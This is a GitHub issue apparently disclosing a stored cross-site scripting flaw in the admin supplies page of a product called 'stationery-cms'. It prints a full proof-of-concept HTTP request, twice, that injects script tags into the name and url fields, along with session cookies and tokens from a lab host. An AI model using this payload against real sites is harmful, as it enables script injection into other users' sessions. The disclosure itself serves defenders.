We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Vulnerability affects product:[stationery-cms] Vulnerability type:storage xss vulnerability(Cross-site scripting) Vulnerability Details: Back Office Supplies Management-Link-Exist Store xss http://127.0.0.1:8091/admin/stationeries/1/edit poc `POST /admin/stationeries/13 HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 844 Accept: text/html, /; q=0.01 X-Requested-With: XMLHttpRequest X-PJAX: true X-PJAX-Container: #pjax-container User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJm27fVVBIxO2o8LO Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin/stationeries/13/edit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: cms_ds_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJtYXN0ZXIiLCJpc3MiOiJKUkNtcyIsInN1YiI6IkpSQ21zLURhc2hib2FyZCIsImV4cCI6MTY5ODgxOTIzNn0.IbsTyYy5sJZlBDtgIiOb9G6idpa9b2LkWioRlSMlSEA; .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuXw6Bar2FloCPnRmIK8z27i1l1eQZE9H20ZfZqx9xSA5gVSrZS5hfpqeu4tILEhHunDaAOIqfEmmxsRNV2SMHnwXt_-X0kdVf67A8e1MWMxP-p-tuJZSsa7zVQwOFqTVBFHpgk2dGT3N2U0Th0WR3lQUMdM42wC-XbWYchKNG_fiMCNOPg2MXOFaBmuPreHzuI2wxc-a8KiA7afrdzzz4BnurbEbl8aR8DL0WYq8jFHxZdo1RwJwXULO2qvHYIQzgjZvELBShr4j8C6FJ82VBL5Gq3zFSHAJZ0ddy2q9M0cLUVM4alP8kmxfwfeaVHMZR1cS3_WwDQz5hvGNQuVwIijYdb4HUUpYTKZh2hs_j-o0joMSDe7mdS_3rTvyQ5errD_GkyZZnZL7qZ2jydHhlZMa2vPLOHmLFan6WXhtTk0E_1-zYB117H7tFTA_jJGaNrPVYEuQmmSuBf3kwlWwV1TfGQYL7dPbZDscJdMhn34YnL3LvBlWmY6wRO1ZkZrLmRSsIzcWL7PKHaELAXf8VHz; XSRF-TOKEN=eyJpdiI6ImxcL0FObklUUmtUVVFHNGFkanZGeFZRPT0iLCJ2YWx1ZSI6IlNtQmI3T1lcL0E4d3RPREh1c0MrcU1Fb1JiVzFwQlg3M0M2eGxraUIzVHdyeXQ0Y2tqQXUrTGZuWnRDMk81SFlvIiwibWFjIjoiMzljZDE0OTU5OTZkMWRhNTJmYmQwNzFjZTVjMDVkZTQ1NjkwN2I0YTFiZDM4Y2ZmNTYxZTA0ZTRlZTU0MzNhMCJ9; laravel_session=eyJpdiI6InpqMklON3VXb3VjQk5iVEhRR05aT3c9PSIsInZhbHVlIjoiam5wY0JGMW9kalwvUEw1cTZrXC8zVzd4NkxKY3FQK2RkZ094SXRjK1YzcTJ6RHorTjR2YlFUUDVSSmpIc0NzSFM0IiwibWFjIjoiYmZlMzljOWUzYzI5MDJmMzEwNGE2MDE2YjY5MGQ4YTQ5ODAzMWY1ODAwZmQ0Mzc5MmMzYWU3YmY5MTE2NzUxNyJ9 Connection: close
------WebKitFormBoundaryJm27fVVBIxO2o8LO Content-Disposition: form-data; name="name"
testxss<script>alert(1)</script> ------WebKitFormBoundaryJm27fVVBIxO2o8LO Content-Disposition: form-data; name="user_id"
------WebKitFormBoundaryJm27fVVBIxO2o8LO Content-Disposition: form-data; name="user_id"
17 ------WebKitFormBoundaryJm27fVVBIxO2o8LO Content-Disposition: form-data; name="url"
http://www.bai<script>alert(1)</script>dx.com ------WebKitFormBoundaryJm27fVVBIxO2o8LO Content-Disposition: form-data; name="_token"
ED1xpWqdNpwzitdl1h6dkpsshUMpYwt7fxtNdVVY ------WebKitFormBoundaryJm27fVVBIxO2o8LO Content-Disposition: form-data; name="_method"
PUT ------WebKitFormBoundaryJm27fVVBIxO2o8LO Content-Disposition: form-data; name="previous"
http://192.168.3.129:8091/admin/stationeries?name= ------WebKitFormBoundaryJm27fVVBIxO2o8LO--` then you can view in url
http://127.0.0.1:8091/admin/stationeries?name=
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Vulnerability affects product:[stationery-cms]
Vulnerability type:storage xss vulnerability(Cross-site scripting)
Vulnerability Details:
Back Office Supplies Management-Link-Exist Store xss
http://127.0.0.1:8091/admin/stationeries/1/edit
poc
`POST /admin/stationeries/13 HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 844
Accept: text/html, /; q=0.01
X-Requested-With: XMLHttpRequest
X-PJAX: true
X-PJAX-Container: #pjax-container
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJm27fVVBIxO2o8LO
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin/stationeries/13/edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cms_ds_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJtYXN0ZXIiLCJpc3MiOiJKUkNtcyIsInN1YiI6IkpSQ21zLURhc2hib2FyZCIsImV4cCI6MTY5ODgxOTIzNn0.IbsTyYy5sJZlBDtgIiOb9G6idpa9b2LkWioRlSMlSEA; .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuXw6Bar2FloCPnRmIK8z27i1l1eQZE9H20ZfZqx9xSA5gVSrZS5hfpqeu4tILEhHunDaAOIqfEmmxsRNV2SMHnwXt_-X0kdVf67A8e1MWMxP-p-tuJZSsa7zVQwOFqTVBFHpgk2dGT3N2U0Th0WR3lQUMdM42wC-XbWYchKNG_fiMCNOPg2MXOFaBmuPreHzuI2wxc-a8KiA7afrdzzz4BnurbEbl8aR8DL0WYq8jFHxZdo1RwJwXULO2qvHYIQzgjZvELBShr4j8C6FJ82VBL5Gq3zFSHAJZ0ddy2q9M0cLUVM4alP8kmxfwfeaVHMZR1cS3_WwDQz5hvGNQuVwIijYdb4HUUpYTKZh2hs_j-o0joMSDe7mdS_3rTvyQ5errD_GkyZZnZL7qZ2jydHhlZMa2vPLOHmLFan6WXhtTk0E_1-zYB117H7tFTA_jJGaNrPVYEuQmmSuBf3kwlWwV1TfGQYL7dPbZDscJdMhn34YnL3LvBlWmY6wRO1ZkZrLmRSsIzcWL7PKHaELAXf8VHz; XSRF-TOKEN=eyJpdiI6ImxcL0FObklUUmtUVVFHNGFkanZGeFZRPT0iLCJ2YWx1ZSI6IlNtQmI3T1lcL0E4d3RPREh1c0MrcU1Fb1JiVzFwQlg3M0M2eGxraUIzVHdyeXQ0Y2tqQXUrTGZuWnRDMk81SFlvIiwibWFjIjoiMzljZDE0OTU5OTZkMWRhNTJmYmQwNzFjZTVjMDVkZTQ1NjkwN2I0YTFiZDM4Y2ZmNTYxZTA0ZTRlZTU0MzNhMCJ9; laravel_session=eyJpdiI6InpqMklON3VXb3VjQk5iVEhRR05aT3c9PSIsInZhbHVlIjoiam5wY0JGMW9kalwvUEw1cTZrXC8zVzd4NkxKY3FQK2RkZ094SXRjK1YzcTJ6RHorTjR2YlFUUDVSSmpIc0NzSFM0IiwibWFjIjoiYmZlMzljOWUzYzI5MDJmMzEwNGE2MDE2YjY5MGQ4YTQ5ODAzMWY1ODAwZmQ0Mzc5MmMzYWU3YmY5MTE2NzUxNyJ9
Connection: close
------WebKitFormBoundaryJm27fVVBIxO2o8LO
Content-Disposition: form-data; name="name"
testxss<script>alert(1)</script>
------WebKitFormBoundaryJm27fVVBIxO2o8LO
Content-Disposition: form-data; name="user_id"
------WebKitFormBoundaryJm27fVVBIxO2o8LO
Content-Disposition: form-data; name="user_id"
17
------WebKitFormBoundaryJm27fVVBIxO2o8LO
Content-Disposition: form-data; name="url"
http://www.bai<script>alert(1)</script>dx.com
------WebKitFormBoundaryJm27fVVBIxO2o8LO
Content-Disposition: form-data; name="_token"
ED1xpWqdNpwzitdl1h6dkpsshUMpYwt7fxtNdVVY
------WebKitFormBoundaryJm27fVVBIxO2o8LO
Content-Disposition: form-data; name="_method"
PUT
------WebKitFormBoundaryJm27fVVBIxO2o8LO
Content-Disposition: form-data; name="previous"
http://192.168.3.129:8091/admin/stationeries?name=
------WebKitFormBoundaryJm27fVVBIxO2o8LO--`
then you can view in url
http://127.0.0.1:8091/admin/stationeries?name=
The text was updated successfully, but these errors were encountered: